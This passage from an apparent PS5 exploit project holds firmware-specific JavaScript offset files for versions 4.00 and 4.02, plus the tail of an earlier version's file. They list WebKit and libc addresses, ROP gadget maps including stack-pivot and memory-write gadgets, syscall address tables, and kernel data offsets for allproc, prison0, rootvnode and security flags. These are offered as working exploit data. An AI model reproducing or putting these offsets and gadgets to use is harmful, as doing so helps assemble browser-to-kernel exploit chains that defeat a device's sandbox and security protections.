351 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
352 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
353 | 0x2AA: 0x32910, // sys_cap_fcntls_get
354 | 0x2AB: 0x34C70, // sys_bindat
355 | 0x2AC: 0x33470, // sys_connectat
356 | 0x2AD: 0x326D0, // sys_chflagsat
357 | 0x2AE: 0x32520, // sys_accept4
358 | 0x2AF: 0x32B10, // sys_pipe2
359 | 0x2B0: 0x33510, // sys_aio_mlock
360 | 0x2B1: 0x34BF0, // sys_procctl
361 | 0x2B2: 0x33EA0, // sys_ppoll
362 | 0x2B3: 0x33DE0, // sys_futimens
363 | 0x2B4: 0x34590, // sys_utimensat
364 | 0x2B5: 0x33B00, // sys_numa_getaffinity
365 | 0x2B6: 0x33960, // sys_numa_setaffinity
366 | 0x2C1: 0x32970, // sys_get_phys_page_size
367 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
368 | 0x2CC: 0x331B0, // sys_openintr
369 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
370 | 0x2CE: 0x33290, // sys_acinfo_add
371 | 0x2CF: 0x32500, // sys_acinfo_delete
372 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
373 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
374 | 0x2D2: 0x32750, // sys_workspace_ctrl
375 | };
376 |
377 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x702A;
378 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x31702A;
379 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE702A;
380 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
381 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
382 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
383 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
384 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
385 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
386 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
387 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.00.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04520;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x001A78B2,
22 | "pop rcx": 0x000156EA,
23 | "pop r8" : 0x004CAC02,
24 | "pop r9" : 0x004E44AC,
25 | "pop rax": 0x000A2654,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118510,
29 | "mov [rdi], rax": 0x0012547A,
30 | "mov [rdi], eax": 0x00019513,
31 |
32 | "infloop": 0x00013B01,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x002040C2,
36 | "sete al" : 0x00029471,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B75F7,
39 | "setg al" : 0x000708C9,
40 | "setl al" : 0x001F9FAC,
41 | "shl rax, 3" : 0x01A43EA3,
42 | "add rax, rdx" : 0x016F48E8,
43 | "mov rax, [rax]" : 0x00010B4C,
44 | "inc dword [rax]": 0x0176294F,
45 | };
46 |
47 | //check
48 | let syscall_map = {
49 | 0x001: 0x34230, // sys_exit
50 | 0x002: 0x351E0, // sys_fork
51 | 0x003: 0x33400, // sys_read
52 | 0x004: 0x33360, // sys_write
53 | 0x005: 0x33A00, // sys_open
54 | 0x006: 0x34030, // sys_close
55 | 0x007: 0x32C20, // sys_wait4
56 | 0x00A: 0x34D20, // sys_unlink
57 | 0x00C: 0x346B0, // sys_chdir
58 | 0x00F: 0x340B0, // sys_chmod
59 | 0x014: 0x33580, // sys_getpid
60 | 0x017: 0x33080, // sys_setuid
61 | 0x018: 0x34690, // sys_getuid
62 | 0x019: 0x33A40, // sys_geteuid
63 | 0x01B: 0x33AE0, // sys_recvmsg
64 | 0x01C: 0x33D10, // sys_sendmsg
65 | 0x01D: 0x34860, // sys_recvfrom
66 | 0x01E: 0x32F80, // sys_accept
67 | 0x01F: 0x32DA0, // sys_getpeername
68 | 0x020: 0x34EC0, // sys_getsockname
69 | 0x021: 0x349E0, // sys_access
70 | 0x022: 0x34B60, // sys_chflags
71 | 0x023: 0x34530, // sys_fchflags
72 | 0x024: 0x35410, // sys_sync
73 | 0x025: 0x339E0, // sys_kill
74 | 0x027: 0x33480, // sys_getppid
75 | 0x029: 0x34A40, // sys_dup
76 | 0x02A: 0x333D0, // sys_pipe
77 | 0x02B: 0x35080, // sys_getegid
78 | 0x02C: 0x353D0, // sys_profil
79 | 0x02F: 0x32F20, // sys_getgid
80 | 0x031: 0x32F00, // sys_getlogin
81 | 0x032: 0x34790, // sys_setlogin
82 | 0x035: 0x33140, // sys_sigaltstack
83 | 0x036: 0x332A0, // sys_ioctl
84 | 0x037: 0x34570, // sys_reboot
85 | 0x038: 0x34470, // sys_revoke
86 | 0x03B: 0x34770, // sys_execve
87 | 0x041: 0x34110, // sys_msync
88 | 0x049: 0x33900, // sys_munmap
89 | 0x04A: 0x34670, // sys_mprotect
90 | 0x04B: 0x337F0, // sys_madvise
91 | 0x04E: 0x339C0, // sys_mincore
92 | 0x04F: 0x32E80, // sys_getgroups
93 | 0x050: 0x33420, // sys_setgroups
94 | 0x053: 0x32E60, // sys_setitimer
95 | 0x056: 0x32C80, // sys_getitimer
96 | 0x059: 0x344D0, // sys_getdtablesize
97 | 0x05A: 0x348E0, // sys_dup2
98 | 0x05C: 0x33F10, // sys_fcntl
99 | 0x05D: 0x33A60, // sys_select
100 | 0x05F: 0x32EC0, // sys_fsync
101 | 0x060: 0x33DF0, // sys_setpriority
102 | 0x061: 0x33640, // sys_socket
103 | 0x062: 0x346D0, // sys_connect
104 | 0x063: 0x35040, // sys_netcontrol
105 | 0x064: 0x32C40, // sys_getpriority
106 | 0x065: 0x34C60, // sys_netabort
107 | 0x066: 0x34FE0, // sys_netgetsockinfo
108 | 0x068: 0x34CE0, // sys_bind
109 | 0x069: 0x33F50, // sys_setsockopt
110 | 0x06A: 0x33240, // sys_listen
111 | 0x071: 0x34250, // sys_socketex
112 | 0x072: 0x33C20, // sys_socketclose
113 | 0x074: 0x353F0, // sys_gettimeofday
114 | 0x075: 0x354D0, // sys_getrusage
115 | 0x076: 0x32C00, // sys_getsockopt
116 | 0x078: 0x33E90, // sys_readv
117 | 0x079: 0x33CF0, // sys_writev
118 | 0x07A: 0x34940, // sys_settimeofday
119 | 0x07C: 0x33880, // sys_fchmod
120 | 0x07D: 0x340F0, // sys_netgetiflist
121 | 0x07E: 0x34FC0, // sys_setreuid
122 | 0x07F: 0x33BE0, // sys_setregid
123 | 0x080: 0x34B40, // sys_rename
124 | 0x083: 0x33B60, // sys_flock
125 | 0x085: 0x35430, // sys_sendto
126 | 0x086: 0x35260, // sys_shutdown
127 | 0x087: 0x345F0, // sys_socketpair
128 | 0x088: 0x34390, // sys_mkdir
129 | 0x089: 0x335E0, // sys_rmdir
130 | 0x08A: 0x32AF0, // sys_utimes
131 | 0x08C: 0x34F80, // sys_adjtime
132 | 0x08D: 0x340D0, // sys_kqueueex
133 | 0x093: 0x34330, // sys_setsid
134 | 0x0A5: 0x32E20, // sys_sysarch
135 | 0x0B6: 0x34DC0, // sys_setegid
136 | 0x0B7: 0x32C60, // sys_seteuid
137 | 0x0BC: 0x34E20, // sys_stat
138 | 0x0BD: 0x35220, // sys_fstat
139 | 0x0BE: 0x33C00, // sys_lstat
140 | 0x0BF: 0x33300, // sys_pathconf
141 | 0x0C0: 0x345B0, // sys_fpathconf
142 | 0x0C2: 0x33B40, // sys_getrlimit
143 | 0x0C3: 0x33720, // sys_setrlimit
144 | 0x0C4: 0x34D40, // sys_getdirentries
145 | 0x0CA: 0x34B20, // sys___sysctl
146 | 0x0CB: 0x341D0, // sys_mlock
147 | 0x0CC: 0x34BC0, // sys_munlock
148 | 0x0CE: 0x33680, // sys_futimes
149 | 0x0D1: 0x33C60, // sys_poll
150 | 0x0E8: 0x32D20, // sys_clock_gettime
151 | 0x0E9: 0x34190, // sys_clock_settime
152 | 0x0EA: 0x35190, // sys_clock_getres
153 | 0x0EB: 0x34D60, // sys_ktimer_create
154 | 0x0EC: 0x334E0, // sys_ktimer_delete
155 | 0x0ED: 0x35240, // sys_ktimer_settime
156 | 0x0EE: 0x346F0, // sys_ktimer_gettime
157 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
158 | 0x0F0: 0x34C20, // sys_nanosleep
159 | 0x0F1: 0x34450, // sys_ffclock_getcounter
160 | 0x0F2: 0x33440, // sys_ffclock_setestimate
161 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
162 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
163 | 0x0FD: 0x34880, // sys_issetugid
164 | 0x110: 0x35020, // sys_getdents
165 | 0x121: 0x34730, // sys_preadv
166 | 0x122: 0x33C80, // sys_pwritev
167 | 0x136: 0x33980, // sys_getsid
168 | 0x13B: 0x34E40, // sys_aio_suspend
169 | 0x144: 0x33500, // sys_mlockall
170 | 0x145: 0x34900, // sys_munlockall
171 | 0x147: 0x33600, // sys_sched_setparam
172 | 0x148: 0x34270, // sys_sched_getparam
173 | 0x149: 0x32DC0, // sys_sched_setscheduler
174 | 0x14A: 0x33C40, // sys_sched_getscheduler
175 | 0x14B: 0x33AA0, // sys_sched_yield
176 | 0x14C: 0x33040, // sys_sched_get_priority_max
177 | 0x14D: 0x33160, // sys_sched_get_priority_min
178 | 0x14E: 0x33390, // sys_sched_rr_get_interval
179 | 0x154: 0x32B50, // sys_sigprocmask
180 | 0x155: 0x32B90, // sys_sigsuspend
181 | 0x157: 0x34A60, // sys_sigpending
182 | 0x159: 0x34B80, // sys_sigtimedwait
183 | 0x15A: 0x347C0, // sys_sigwaitinfo
184 | 0x16A: 0x34DA0, // sys_kqueue
185 | 0x16B: 0x33000, // sys_kevent
186 | 0x17B: 0x32FA0, // sys_mtypeprotect
187 | 0x188: 0x330C0, // sys_uuidgen
188 | 0x189: 0x35510, // sys_sendfile
189 | 0x18D: 0x33560, // sys_fstatfs
190 | 0x190: 0x33120, // sys_ksem_close
191 | 0x191: 0x33EB0, // sys_ksem_post
192 | 0x192: 0x34750, // sys_ksem_wait
193 | 0x193: 0x354F0, // sys_ksem_trywait
194 | 0x194: 0x33260, // sys_ksem_init
195 | 0x195: 0x34C80, // sys_ksem_open
196 | 0x196: 0x34960, // sys_ksem_unlink
197 | 0x197: 0x330E0, // sys_ksem_getvalue
198 | 0x198: 0x34920, // sys_ksem_destroy
199 | 0x1A0: 0x34E00, // sys_sigaction
200 | 0x1A1: 0x34AA0, // sys_sigreturn
201 | 0x1A5: 0x33780, // sys_getcontext
202 | 0x1A6: 0x344B0, // sys_setcontext
203 | 0x1A7: 0x345D0, // sys_swapcontext
204 | 0x1AD: 0x337D0, // sys_sigwait
205 | 0x1AE: 0x32EA0, // sys_thr_create
206 | 0x1AF: 0x33200, // sys_thr_exit
207 | 0x1B0: 0x33BA0, // sys_thr_self
208 | 0x1B1: 0x33220, // sys_thr_kill
209 | 0x1B9: 0x34840, // sys_ksem_timedwait
210 | 0x1BA: 0x32B70, // sys_thr_suspend
211 | 0x1BB: 0x334A0, // sys_thr_wake
212 | 0x1BC: 0x34510, // sys_kldunloadf
213 | 0x1C6: 0x35200, // sys__umtx_op
214 | 0x1C7: 0x34F40, // sys_thr_new
215 | 0x1C8: 0x34EA0, // sys_sigqueue
216 | 0x1D0: 0x34800, // sys_thr_set_name
217 | 0x1D2: 0x33DB0, // sys_rtprio_thread
218 | 0x1DB: 0x33540, // sys_pread
219 | 0x1DC: 0x34650, // sys_pwrite
220 | 0x1DD: 0x34F20, // sys_mmap
221 | 0x1DE: 0x34A20, // sys_lseek
222 | 0x1DF: 0x33AC0, // sys_truncate
223 | 0x1E0: 0x33520, // sys_ftruncate
224 | 0x1E1: 0x32B10, // sys_thr_kill2
225 | 0x1E2: 0x35490, // sys_shm_open
226 | 0x1E3: 0x34F00, // sys_shm_unlink
227 | 0x1E6: 0x33740, // sys_cpuset_getid
228 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
229 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
230 | 0x1F3: 0x32EE0, // sys_openat
231 | 0x203: 0x34590, // sys___cap_rights_get
232 | 0x20A: 0x33FD0, // sys_pselect
233 | 0x214: 0x34090, // sys_regmgr_call
234 | 0x215: 0x33E10, // sys_jitshm_create
235 | 0x216: 0x343F0, // sys_jitshm_alias
236 | 0x217: 0x332E0, // sys_dl_get_list
237 | 0x218: 0x34130, // sys_dl_get_info
238 | 0x21A: 0x34070, // sys_evf_create
239 | 0x21B: 0x334C0, // sys_evf_delete
240 | 0x21C: 0x34410, // sys_evf_open
241 | 0x21D: 0x33FF0, // sys_evf_close
242 | 0x21E: 0x342B0, // sys_evf_wait
243 | 0x21F: 0x34A80, // sys_evf_trywait
244 | 0x220: 0x34430, // sys_evf_set
245 | 0x221: 0x349A0, // sys_evf_clear
246 | 0x222: 0x337B0, // sys_evf_cancel
247 | 0x223: 0x34290, // sys_query_memory_protection
248 | 0x224: 0x33B80, // sys_batch_map
249 | 0x225: 0x33D90, // sys_osem_create
250 | 0x226: 0x32D60, // sys_osem_delete
251 | 0x227: 0x32CE0, // sys_osem_open
252 | 0x228: 0x352E0, // sys_osem_close
253 | 0x229: 0x34370, // sys_osem_wait
254 | 0x22A: 0x34980, // sys_osem_trywait
255 | 0x22B: 0x34610, // sys_osem_post
256 | 0x22C: 0x33EF0, // sys_osem_cancel
257 | 0x22D: 0x33CA0, // sys_namedobj_create
258 | 0x22E: 0x339A0, // sys_namedobj_delete
259 | 0x22F: 0x35570, // sys_set_vm_container
260 | 0x230: 0x33460, // sys_debug_init
261 | 0x233: 0x33DD0, // sys_opmc_enable
262 | 0x234: 0x32E40, // sys_opmc_disable
263 | 0x235: 0x33E50, // sys_opmc_set_ctl
264 | 0x236: 0x33E70, // sys_opmc_set_ctr
265 | 0x237: 0x348C0, // sys_opmc_get_ctr
266 | 0x23C: 0x336E0, // sys_virtual_query
267 | 0x249: 0x34D00, // sys_is_in_sandbox
268 | 0x24A: 0x338C0, // sys_dmem_container
269 | 0x24B: 0x34170, // sys_get_authinfo
270 | 0x24C: 0x32CC0, // sys_mname
271 | 0x24F: 0x332C0, // sys_dynlib_dlsym
272 | 0x250: 0x335C0, // sys_dynlib_get_list
273 | 0x251: 0x35060, // sys_dynlib_get_info
274 | 0x252: 0x33F70, // sys_dynlib_load_prx
275 | 0x253: 0x32F60, // sys_dynlib_unload_prx
276 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
277 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
278 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
279 | 0x258: 0x32B30, // sys_sandbox_path
280 | 0x259: 0x336A0, // sys_mdbg_service
281 | 0x25A: 0x33D30, // sys_randomized_path
282 | 0x25B: 0x34BA0, // sys_rdup
283 | 0x25C: 0x331A0, // sys_dl_get_metadata
284 | 0x25D: 0x338E0, // sys_workaround8849
285 | 0x25E: 0x330A0, // sys_is_development_mode
286 | 0x25F: 0x34210, // sys_get_self_auth_info
287 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
288 | 0x262: 0x35550, // sys_budget_get_ptype
289 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
290 | 0x264: 0x352C0, // sys_get_proc_type_info
291 | 0x265: 0x32AD0, // sys_get_resident_count
292 | 0x267: 0x33E30, // sys_get_resident_fmem_count
293 | 0x268: 0x34EE0, // sys_thr_get_name
294 | 0x269: 0x344F0, // sys_set_gpo
295 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
296 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
297 | 0x26C: 0x33100, // sys_free_stack
298 | 0x26E: 0x32D00, // sys_ipmimgr_call
299 | 0x26F: 0x34150, // sys_get_gpo
300 | 0x270: 0x35530, // sys_get_vm_map_timestamp
301 | 0x271: 0x34AE0, // sys_opmc_set_hw
302 | 0x272: 0x33620, // sys_opmc_get_hw
303 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
304 | 0x274: 0x34310, // sys_mmap_dmem
305 | 0x275: 0x336C0, // sys_physhm_open
306 | 0x276: 0x33ED0, // sys_physhm_unlink
307 | 0x278: 0x35470, // sys_thr_suspend_ucontext
308 | 0x279: 0x33960, // sys_thr_resume_ucontext
309 | 0x27A: 0x33920, // sys_thr_get_ucontext
310 | 0x27B: 0x33A20, // sys_thr_set_ucontext
311 | 0x27C: 0x33660, // sys_set_timezone_info
312 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
313 | 0x27E: 0x33760, // sys_utc_to_localtime
314 | 0x27F: 0x35590, // sys_localtime_to_utc
315 | 0x280: 0x34710, // sys_set_uevt
316 | 0x281: 0x33280, // sys_get_cpu_usage_proc
317 | 0x282: 0x33B00, // sys_get_map_statistics
318 | 0x283: 0x348A0, // sys_set_chicken_switches
319 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
320 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
321 | 0x288: 0x32D40, // sys_app_state_change
322 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
323 | 0x28C: 0x32DE0, // sys_process_terminate
324 | 0x28D: 0x335A0, // sys_blockpool_open
325 | 0x28E: 0x33340, // sys_blockpool_map
326 | 0x28F: 0x34D80, // sys_blockpool_unmap
327 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
328 | 0x291: 0x33A80, // sys_blockpool_batch
329 | 0x292: 0x331E0, // sys_fdatasync
330 | 0x293: 0x33700, // sys_dynlib_get_list2
331 | 0x294: 0x35450, // sys_dynlib_get_info2
332 | 0x295: 0x34C00, // sys_aio_submit
333 | 0x296: 0x33180, // sys_aio_multi_delete
334 | 0x297: 0x33FB0, // sys_aio_multi_wait
335 | 0x298: 0x33060, // sys_aio_multi_poll
336 | 0x299: 0x34B00, // sys_aio_get_data
337 | 0x29A: 0x33F90, // sys_aio_multi_cancel
338 | 0x29B: 0x32F40, // sys_get_bio_usage_all
339 | 0x29C: 0x34630, // sys_aio_create
340 | 0x29D: 0x350A0, // sys_aio_submit_cmd
341 | 0x29E: 0x34FA0, // sys_aio_init
342 | 0x29F: 0x34A00, // sys_get_page_table_stats
343 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
344 | 0x2A1: 0x35000, // sys_blockpool_move
345 | 0x2A2: 0x34E80, // sys_virtual_query_all
346 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
347 | 0x2A4: 0x347E0, // sys_cpumode_yield
348 | 0x2A5: 0x342F0, // sys_wait6
349 | 0x2A6: 0x33D50, // sys_cap_rights_limit
350 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
351 | 0x2A8: 0x34050, // sys_cap_ioctls_get
352 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
353 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
354 | 0x2AB: 0x35320, // sys_bindat
355 | 0x2AC: 0x33B20, // sys_connectat
356 | 0x2AD: 0x32D80, // sys_chflagsat
357 | 0x2AE: 0x32BD0, // sys_accept4
358 | 0x2AF: 0x331C0, // sys_pipe2
359 | 0x2B0: 0x33BC0, // sys_aio_mlock
360 | 0x2B1: 0x352A0, // sys_procctl
361 | 0x2B2: 0x34550, // sys_ppoll
362 | 0x2B3: 0x34490, // sys_futimens
363 | 0x2B4: 0x34C40, // sys_utimensat
364 | 0x2B5: 0x341B0, // sys_numa_getaffinity
365 | 0x2B6: 0x34010, // sys_numa_setaffinity
366 | 0x2C1: 0x33020, // sys_get_phys_page_size
367 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
368 | 0x2CC: 0x33860, // sys_openintr
369 | 0x2CD: 0x34350, // sys_dl_get_info_2
370 | 0x2CE: 0x33940, // sys_acinfo_add
371 | 0x2CF: 0x32BB0, // sys_acinfo_delete
372 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
373 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
374 | 0x2D2: 0x32E00, // sys_workspace_ctrl
375 | };
376 |
377 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8C1E;
378 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318C1E;
379 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE8C1E;
380 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
381 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
382 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
383 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
384 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
385 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
386 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
387 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.02.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8" : 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708C9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
